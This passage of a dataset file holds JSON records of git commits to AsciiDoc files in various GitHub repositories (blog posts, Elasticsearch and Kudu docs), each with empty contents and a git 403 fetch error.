ezirus\/elasticsearch,petabytedata\/elasticsearch,sneivandt\/elasticsearch,mortonsykes\/elasticsearch,jimczi\/elasticsearch,cnfire\/elasticsearch-1,xingguang2013\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,liweinan0423\/elasticsearch,mortonsykes\/elasticsearch,wenpos\/elasticsearch,iamjakob\/elasticsearch,btiernay\/elasticsearch,kaneshin\/elasticsearch,bawse\/elasticsearch,djschny\/elasticsearch,umeshdangat\/elasticsearch,sposam\/elasticsearch,henakamaMSFT\/elasticsearch,rmuir\/elasticsearch,shreejay\/elasticsearch,caengcjd\/elasticsearch,drewr\/elasticsearch,diendt\/elasticsearch,AndreKR\/elasticsearch,sc0ttkclark\/elasticsearch,andrestc\/elasticsearch,mortonsykes\/elasticsearch,henakamaMSFT\/elasticsearch,strapdata\/elassandra-test,njlawton\/elasticsearch,socialrank\/elasticsearch,coding0011\/elasticsearch,beiske\/elasticsearch,pablocastro\/elasticsearch,naveenhooda2000\/elasticsearch,beiske\/elasticsearch,martinstuga\/elasticsearch,uschindler\/elasticsearch,jpountz\/elasticsearch,jango2015\/elasticsearch,nilabhsagar\/elasticsearch,wimvds\/elasticsearch,polyfractal\/elasticsearch,mm0\/elasticsearch,strapdata\/elassandra-test,strapdata\/elassandra,Charlesdong\/elasticsearch,palecur\/elasticsearch,uschindler\/elasticsearch,uschindler\/elasticsearch,strapdata\/elassandra5-rc,ulkas\/elasticsearch,tkssharma\/elasticsearch,Uiho\/elasticsearch,robin13\/elasticsearch,rento19962\/elasticsearch,ulkas\/elasticsearch,fred84\/elasticsearch,bestwpw\/elasticsearch,hydro2k\/elasticsearch,geidies\/elasticsearch,Helen-Zhao\/elasticsearch,strapdata\/elassandra,adrianbk\/elasticsearch,caengcjd\/elasticsearch,F0lha\/elasticsearch,MisterAndersen\/elasticsearch,bestwpw\/elasticsearch,huanzhong\/elasticsearch,Collaborne\/elasticsearch,GlenRSmith\/elasticsearch,markwalkom\/elasticsearch,bawse\/elasticsearch,camilojd\/elasticsearch,Uiho\/elasticsearch,martinstuga\/elasticsearch,cwurm\/elasticsearch,xingguang2013\/elasticsearch,gmarz\/elasticsearch,YosuaMichael\/elasticsearch,nknize\/elasticsearch,sneivandt\/elasticsearch,weipinghe\/elasticsearch,xuzha\/elasticsearch,LeoYao\/elasticsearch,springning\/elasticsearch,schonfeld\/elasticsearch,ckclark\/elasticsearch,KimTaehee\/elasticsearch,huanzhong\/elasticsearch,xuzha\/elasticsearc
h,kaneshin\/elasticsearch,wuranbo\/elasticsearch,markwalkom\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,LewayneNaidoo\/elasticsearch,s1monw\/elasticsearch,brandonkearby\/elasticsearch,springning\/elasticsearch,gingerwizard\/elasticsearch,uschindler\/elasticsearch,apepper\/elasticsearch,rmuir\/elasticsearch,adrianbk\/elasticsearch,jpountz\/elasticsearch,MichaelLiZhou\/elasticsearch,maddin2016\/elasticsearch,mgalushka\/elasticsearch,vietlq\/elasticsearch,springning\/elasticsearch,caengcjd\/elasticsearch,wimvds\/elasticsearch,jbertouch\/elasticsearch,shreejay\/elasticsearch,camilojd\/elasticsearch,jimczi\/elasticsearch,tahaemin\/elasticsearch,kingaj\/elasticsearch,wittyameta\/elasticsearch,Siddartha07\/elasticsearch,AndreKR\/elasticsearch,petabytedata\/elasticsearch,pablocastro\/elasticsearch,mortonsykes\/elasticsearch,andrejserafim\/elasticsearch,zkidkid\/elasticsearch,girirajsharma\/elasticsearch,qwerty4030\/elasticsearch,artnowo\/elasticsearch,ZTE-PaaS\/elasticsearch,mmaracic\/elasticsearch,infusionsoft\/elasticsearch,dongjoon-hyun\/elasticsearch,lmtwga\/elasticsearch,pablocastro\/elasticsearch,mikemccand\/elasticsearch,Rygbee\/elasticsearch,xingguang2013\/elasticsearch,jango2015\/elasticsearch,sreeramjayan\/elasticsearch,fred84\/elasticsearch,sposam\/elasticsearch,cnfire\/elasticsearch-1,LeoYao\/elasticsearch,polyfractal\/elasticsearch,sc0ttkclark\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,schonfeld\/elasticsearch,polyfractal\/elasticsearch,pranavraman\/elasticsearch,rento19962\/elasticsearch,wangtuo\/elasticsearch,kalburgimanjunath\/elasticsearch,Brijeshrpatel9\/elasticsearch,a2lin\/elasticsearch,lks21c\/elasticsearch,beiske\/elasticsearch,strapdata\/elassandra,glefloch\/elasticsearch,djschny\/elasticsearch,dongjoon-hyun\/elasticsearch,ouyangkongtong\/elasticsearch,diendt\/elasticsearch,weipinghe\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,bestwpw\/elasticsearch,beiske\/elasticsearch,lydonchandra\/elasticsearch,Brijeshrpatel9\/elasticsearch,mgalushka\/elasticsearch,iacdingping\/elasticsearch,clintongormley\/elasticsearch,knight1128\/elasticsearch,qwerty4030\/elasticsearch,maddin2016\/elasticsearch,hafkensite\/elasticsearch,GlenRSmith\/elasticsearch,sdauletau\/elasticsearch,lydonchandra\/elasticsearch,umeshdangat\/elasticsearch,StefanGor\/elasticsearch,jeteve\/elasticsearch,Brijeshrpatel9\/elasticsearch,Shepard1212\/elasticsearch,nellicus\/elasticsearch,beiske\/elasticsearch,nazarewk\/elasticsearch,dongjoon-hyun\/elasticsearch,Collaborne\/elasticsearch,camilojd\/elasticsearch,ouyangkongtong\/elasticsearch,kalimatas\/elasticsearch,markharwood\/elasticsearch,caengcjd\/elasticsearch,yanjunh\/elasticsearch,lmtwga\/elasticsearch,gfyoung\/elasticsearch,coding0011\/elasticsearch,palecur\/elasticsearch,wenpos\/elasticsearch,areek\/elasticsearch,umeshdangat\/elasticsearch,trangvh\/elasticsearch,AndreKR\/elasticsearch,areek\/elasticsearch,JackyMai\/elasticsearch,GlenRSmith\/elasticsearch,rajanm\/elasticsearch,strapdata\/elassandra5-rc,lks21c\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jimczi\/elasticsearch,AndreKR\/elasticsearch,elancom\/elasticsearch,himanshuag\/elasticsearch,MaineC\/elasticsearch,martinstuga\/elasticsearch,F0lha\/elasticsearch,scottsom\/elasticsearch,kunallimaye\/elasticsearch,18098924759\/elasticsearch,achow\/elasticsearch,vroyer\/elassandra,alexshadow007\/elasticsearch,ivansun1010\/elasticsearch,mortonsykes\/elasticsearch,apepper\/elasticsearch,vietlq\/elasticsearch,diendt\/elasticsearch,MaineC\/elasticsearch,LeoYao\/elasticsearch,fernan
dozhu\/elasticsearch,ricardocerq\/elasticsearch,MaineC\/elasticsearch,elasticdog\/elasticsearch,snikch\/elasticsearch,PhaedrusTheGreek\/elasticsearch,jbertouch\/elasticsearch,ESamir\/elasticsearch,jbertouch\/elasticsearch,infusionsoft\/elasticsearch,rajanm\/elasticsearch,fforbeck\/elasticsearch,bestwpw\/elasticsearch,sneivandt\/elasticsearch,elancom\/elasticsearch,Shepard1212\/elasticsearch,dpursehouse\/elasticsearch,cwurm\/elasticsearch,pablocastro\/elasticsearch,rajanm\/elasticsearch,Siddartha07\/elasticsearch,Rygbee\/elasticsearch,trangvh\/elasticsearch,adrianbk\/elasticsearch,awislowski\/elasticsearch,lzo\/elasticsearch-1,Shepard1212\/elasticsearch,masaruh\/elasticsearch,i-am-Nathan\/elasticsearch,areek\/elasticsearch,tebriel\/elasticsearch,s1monw\/elasticsearch,Siddartha07\/elasticsearch,achow\/elasticsearch,ckclark\/elasticsearch,Rygbee\/elasticsearch,LewayneNaidoo\/elasticsearch,mm0\/elasticsearch,coding0011\/elasticsearch,ricardocerq\/elasticsearch,cnfire\/elasticsearch-1,strapdata\/elassandra5-rc,kaneshin\/elasticsearch,Stacey-Gammon\/elasticsearch,adrianbk\/elasticsearch,henakamaMSFT\/elasticsearch,snikch\/elasticsearch,rmuir\/elasticsearch,karthikjaps\/elasticsearch,palecur\/elasticsearch,infusionsoft\/elasticsearch,wenpos\/elasticsearch,kunallimaye\/elasticsearch,mikemccand\/elasticsearch,bestwpw\/elasticsearch,himanshuag\/elasticsearch,martinstuga\/elasticsearch,mjason3\/elasticsearch,mgalushka\/elasticsearch,jango2015\/elasticsearch,mjason3\/elasticsearch,ulkas\/elasticsearch,iacdingping\/elasticsearch,kingaj\/elasticsearch,jeteve\/elasticsearch,infusionsoft\/elasticsearch,dpursehouse\/elasticsearch,yynil\/elasticsearch,HonzaKral\/elasticsearch,Charlesdong\/elasticsearch,snikch\/elasticsearch,nezirus\/elasticsearch,mbrukman\/elasticsearch,gingerwizard\/elasticsearch,ouyangkongtong\/elasticsearch,mcku\/elasticsearch,elancom\/elasticsearch,episerver\/elasticsearch,sreeramjayan\/elasticsearch,liweinan0423\/elasticsearch,yanjunh\/elasticsearch,vroyer\/elasticassandra,shreejay\/elasticsearch,i-am-Nathan\/elasticsearch,umeshdangat\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,nilabhsagar\/elasticsearch,pritishppai\/elasticsearch,nazarewk\/elasticsearch,xingguang2013\/elasticsearch,elasticdog\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,elancom\/elasticsearch,hafkensite\/elasticsearch,nezirus\/elasticsearch,jpountz\/elasticsearch,jpountz\/elasticsearch,ouyangkongtong\/elasticsearch,alexshadow007\/elasticsearch,18098924759\/elasticsearch,huanzhong\/elasticsearch,robin13\/elasticsearch,jeteve\/elasticsearch,YosuaMichael\/elasticsearch,episerver\/elasticsearch,geidies\/elasticsearch,gingerwizard\/elasticsearch,nrkkalyan\/elasticsearch,onegambler\/elasticsearch,areek\/elasticsearch,LewayneNaidoo\/elasticsearch,fernandozhu\/elasticsearch,geidies\/elasticsearch,mapr\/elasticsearch,wenpos\/elasticsearch,ulkas\/elasticsearch,himanshuag\/elasticsearch,yongminxia\/elasticsearch,drewr\/elasticsearch,avikurapati\/elasticsearch,drewr\/elasticsearch,petabytedata\/elasticsearch,Rygbee\/elasticsearch,fforbeck\/elasticsearch,episerver\/elasticsearch,pritishppai\/elasticsearch,IanvsPoplicola\/elasticsearch,slavau\/elasticsearch,ricardocerq\/elasticsearch,wimvds\/elasticsearch,JervyShi\/elasticsearch,gfyoung\/elasticsearch,MetSystem\/elasticsearch,MetSystem\/elasticsearch,socialrank\/elasticsearch,episerver\/elasticsearch,iacdingping\/elasticsearch,wittyameta\/elasticsearch,PhaedrusTheGreek\/elasticsearch,knight1128\/elasticsearch,mm0\/elasticsearch,petabytedata\/elasticsearch,onegambler\/ela
sticsearch,springning\/elasticsearch,Collaborne\/elasticsearch,KimTaehee\/elasticsearch,areek\/elasticsearch,avikurapati\/elasticsearch,trangvh\/elasticsearch,tebriel\/elasticsearch,mbrukman\/elasticsearch,Brijeshrpatel9\/elasticsearch,Siddartha07\/elasticsearch,scorpionvicky\/elasticsearch,apepper\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,lzo\/elasticsearch-1,kingaj\/elasticsearch,pranavraman\/elasticsearch,glefloch\/elasticsearch,sc0ttkclark\/elasticsearch,ImpressTV\/elasticsearch,adrianbk\/elasticsearch,sreeramjayan\/elasticsearch,djschny\/elasticsearch,nazarewk\/elasticsearch,Stacey-Gammon\/elasticsearch,clintongormley\/elasticsearch,slavau\/elasticsearch,girirajsharma\/elasticsearch,sposam\/elasticsearch,snikch\/elasticsearch,wimvds\/elasticsearch,spiegela\/elasticsearch,myelin\/elasticsearch,apepper\/elasticsearch,alexshadow007\/elasticsearch,ckclark\/elasticsearch,strapdata\/elassandra,masaruh\/elasticsearch,nellicus\/elasticsearch,jbertouch\/elasticsearch,pritishppai\/elasticsearch,YosuaMichael\/elasticsearch,slavau\/elasticsearch,nezirus\/elasticsearch,dongjoon-hyun\/elasticsearch,jchampion\/elasticsearch,a2lin\/elasticsearch,vroyer\/elassandra,bawse\/elasticsearch,qwerty4030\/elasticsearch,adrianbk\/elasticsearch,mm0\/elasticsearch,HonzaKral\/elasticsearch,yynil\/elasticsearch,rlugojr\/elasticsearch,masaruh\/elasticsearch,snikch\/elasticsearch,LewayneNaidoo\/elasticsearch,markwalkom\/elasticsearch,kunallimaye\/elasticsearch,vietlq\/elasticsearch,Ansh90\/elasticsearch,Uiho\/elasticsearch,karthikjaps\/elasticsearch,fforbeck\/elasticsearch,sdauletau\/elasticsearch,davidvgalbraith\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,truemped\/elasticsearch,jango2015\/elasticsearch,camilojd\/elasticsearch,JackyMai\/elasticsearch,yongminxia\/elasticsearch,mgalushka\/elasticsearch,Ansh90\/elasticsearch,sdauletau\/elasticsearch","old_file":"TESTING.asciidoc","new_file":"TESTING.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1fd5e34f98f14477f412a6a06c2ce180d962fb12","subject":"Update YYYY-mm-dd-Otro-post.adoc","message":"Update YYYY-mm-dd-Otro-post.adoc","repos":"iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io,iesextremadura\/iesextremadura.github.io","old_file":"_posts\/YYYY-mm-dd-Otro-post.adoc","new_file":"_posts\/YYYY-mm-dd-Otro-post.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/iesextremadura\/iesextremadura.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e34a2f4db86ebf3c3e60732091215091255d91b4","subject":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-by-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-by-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"58af0cfc645ac438c7b787d0c6b8d2549c48d8d8","subject":"Renamed '_posts\/2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc' to '_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc'","message":"Renamed '_posts\/2017-02-23-What-is-Dev-Ops-and-why-is-Dev-Ops-great-for-any-tech-team.adoc' to '_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc'","repos":"pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io,pysysops\/pysysops.github.io","old_file":"_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc","new_file":"_posts\/2017-02-23-What-are-Dev-Ops-SRE-and-Platform-Engineers-and-are-we-really-getting-it-right.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pysysops\/pysysops.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"13906d77c74f38e6fbe7d243f7a347c0124363ab","subject":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","message":"Publish 2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","repos":"raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io,raghakot\/raghakot.github.io","old_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_file":"2010-12-8-Recenberg-15th-success-rule-applied-to-life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/raghakot\/raghakot.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0fba9d426c0da117f2e1336a7ba85a51c6ff0af2","subject":"Update 2015-11-06-Yeah-About-that-story.adoc","message":"Update 2015-11-06-Yeah-About-that-story.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_file":"_posts\/2015-11-06-Yeah-About-that-story.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e7f877ead0a04d989b0f5aa2768e96c4bf8bf69","subject":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","message":"Update 2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_file":"_posts\/2017-12-08-A-W-S-Cloud9-G-A-E-Go.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8fa3ca9b90f191d04e6c5ff225196ab41d834fd5","subject":"Fix the links to impala-kudu","message":"Fix the links to impala-kudu\n\nThe links are currently broken, they still point to the kimpala directory\nwhile the packages are actually available in the impala-kudu directory.\n\nThat is the link reads:\nhttp:\/\/archive.cloudera.com\/beta\/impala-kudu\/redhat\/6\/x86_64\/kimpala\/\n\nBut in our staging\/hidden repo the link 
is\nhttp:\/\/archive-primary.cloudera.com\/beta\/impala-kudu\/ubuntu\/trusty\/amd64\/impala-kudu\n\nChange-Id: I4cc119ff4c9af2a05435e53c5daa1f96cc35847e\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1022\nReviewed-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\nTested-by: Mike Percy <e07a1fd797b473a9c849e618aa2ce06d8055760b@cloudera.com>\n","repos":"cloudera\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,helifu\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,InspurUSA\/kudu,cloudera\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu","old_file":"docs\/kudu_impala_integration.adoc","new_file":"docs\/kudu_impala_integration.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"ce8d52eb14f67c2d9e5f381cf31bba84305650ab","subject":"Update 2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","message":"Update 2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","repos":"pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io,pepite\/hubpress.io","old_file":"_posts\/2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","new_file":"_posts\/2016-08-08-Continuous-Delivery-on-Git-Lab-with-Play-Scala-SBT-and-Heroku.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pepite\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ae6dfa47201ee15285f457ce8bfb847fe834e57a","subject":"Update 2016-03-28-.adoc","message":"Update 2016-03-28-.adoc","repos":"regdog\/regdog.github.io,regdog\/regdog.github.io,regdog\/regdog.github.io","old_file":"_posts\/2016-03-28-.adoc","new_file":"_posts\/2016-03-28-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/regdog\/regdog.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a705db2b23033643fb26147274789082a4bdf14b","subject":"Update 2017-11-12-.adoc","message":"Update 2017-11-12-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-11-12-.adoc","new_file":"_posts\/2017-11-12-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cd277ddff2a6671a3ae2b737d2b39d331b73d77c","subject":"y2b create post Beats by Dr Dre Tour Unboxing (White)","message":"y2b create post Beats by Dr Dre Tour Unboxing 
(White)","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-30-Beats-by-Dr-Dre-Tour-Unboxing-White.adoc","new_file":"_posts\/2011-12-30-Beats-by-Dr-Dre-Tour-Unboxing-White.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"bdc55739d86ef70c4dcd489e8eea3addac43a63a","subject":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","message":"Update 2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","repos":"fraslo\/fraslo.github.io,fraslo\/fraslo.github.io,fraslo\/fraslo.github.io","old_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_file":"_posts\/2015-01-31-Das-war-der-5-Linux-Informationstag.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fraslo\/fraslo.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ea14c79c15a9fec3c44d274d5f35aed8636aec1f","subject":"Document autoediting in doc\/autoedit.asciidoc","message":"Document autoediting in doc\/autoedit.asciidoc\n","repos":"alexherbo2\/kakoune,casimir\/kakoune,alpha123\/kakoune,casimir\/kakoune,zakgreant\/kakoune,danr\/kakoune,flavius\/kakoune,alexherbo2\/kakoune,mawww\/kakoune,elegios\/kakoune,ekie\/kakoune,danr\/kakoune,xificurC\/kakoune,flavius\/kakoune,Somasis\/kakoune,alpha123\/kakoune,occivink\/kakoune,danielma\/kakoune,flavius\/kakoune,alpha123\/kakoune,Asenar\/kakoune,zakgreant\/kakoune,jkonecny12\/kakoune,mawww\/kakoune,ekie\/kakoune,lenormf\/kakoune,lenormf\/kakoune,casimir\/kakoune,danielma\/kakoune,zakgreant\/kakoune,occivink\/kakoune,jjthrash\/kakoune,Somasis\/kakoune,danielma\/kakoune,xificurC\/kakoune,Asenar\/kakoune,danr\/kakoune,mawww\/kakoune,jjthrash\/kakoune,xificurC\/kakoune,rstacruz\/kakoune,alexherbo2\/kakoune,jkonecny12\/kakoune,Asenar\/kakoune,jjthrash\/kakoune,alexherbo2\/kakoune,danielma\/kakoune,flavius\/kakoune,elegios\/kakoune,jkonecny12\/kakoune,Asenar\/kakoune,Somasis\/kakoune,mawww\/kakoune,zakgreant\/kakoune,Somasis\/kakoune,rstacruz\/kakoune,ekie\/kakoune,elegios\/kakoune,danr\/kakoune,rstacruz\/kakoune,casimir\/kakoune,xificurC\/kakoune,lenormf\/kakoune,lenormf\/kakoune,alpha123\/kakoune,jjthrash\/kakoune,rstacruz\/kakoune,elegios\/kakoune,occivink\/kakoune,ekie\/kakoune,jkonecny12\/kakoune,occivink\/kakoune","old_file":"doc\/autoedit.asciidoc","new_file":"doc\/autoedit.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ekie\/kakoune.git\/': The requested URL returned error: 403\n","license":"unlicense","lang":"AsciiDoc"} {"commit":"f6ebeb7101832e16b6802af6d47606bb73463d75","subject":"fixing https:\/\/github.com\/docker\/labs\/issues\/363","message":"fixing https:\/\/github.com\/docker\/labs\/issues\/363\n","repos":"ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs,ManoMarks\/labs","old_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_file":"developer-tools\/java\/chapters\/ch10-monitoring.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ManoMarks\/labs.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a9a2e92f2e72434d9b3c1f46ea5f33169b79237e","subject":"y2b create post Unboxing The Biggest Bluetooth Speaker","message":"y2b create post Unboxing The Biggest Bluetooth Speaker","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-07-22-Unboxing-The-Biggest-Bluetooth-Speaker.adoc","new_file":"_posts\/2017-07-22-Unboxing-The-Biggest-Bluetooth-Speaker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1665bd29dbf9a8b2a6d3c92a9f78ca12ba22cce8","subject":"Added the sagan adoc files","message":"Added the sagan adoc files\n","repos":"mminella\/spring-cloud-task,mminella\/spring-cloud-task,spring-cloud\/spring-cloud-task,cppwfs\/spring-cloud-task","old_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/sagan-index.adoc","new_file":"spring-cloud-task-docs\/src\/main\/asciidoc\/sagan-index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-task.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"0966684fc61561be5a5730e569f4ee6245463eed","subject":"update ntp doc","message":"update ntp doc\n","repos":"jbosschina\/openshift-cookbooks","old_file":"linux\/basic\/ntp.adoc","new_file":"linux\/basic\/ntp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbosschina\/openshift-cookbooks.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1945701af0a317074ff06d8e04d31149628dc815","subject":"Create file","message":"Create file","repos":"XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4,XillioQA\/xill-platform-3.4","old_file":"xill-web-service\/tmp-test\/create-worker\/http-request.adoc","new_file":"xill-web-service\/tmp-test\/create-worker\/http-request.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/XillioQA\/xill-platform-3.4.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"203f3e205c90db3d399621a045cd6f72b34ac7a1","subject":"y2b create post Unboxing The New $1600 Razer Blade Stealth","message":"y2b create post Unboxing The New $1600 Razer Blade Stealth","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-12-Unboxing-The-New-1600-Razer-Blade-Stealth.adoc","new_file":"_posts\/2017-08-12-Unboxing-The-New-1600-Razer-Blade-Stealth.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a4da88a3fe6c15dfed1a6055e99f636db9893a99","subject":"Update 2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","message":"Update 
2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","new_file":"_posts\/2018-06-07-La-ilusion-colectiva-del-valor-del-dinero.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9b8566b74b9fc6f42cc44b2377759f28fe412193","subject":"Update 2016-04-03-etat-limite-personnalite-borderline.adoc","message":"Update 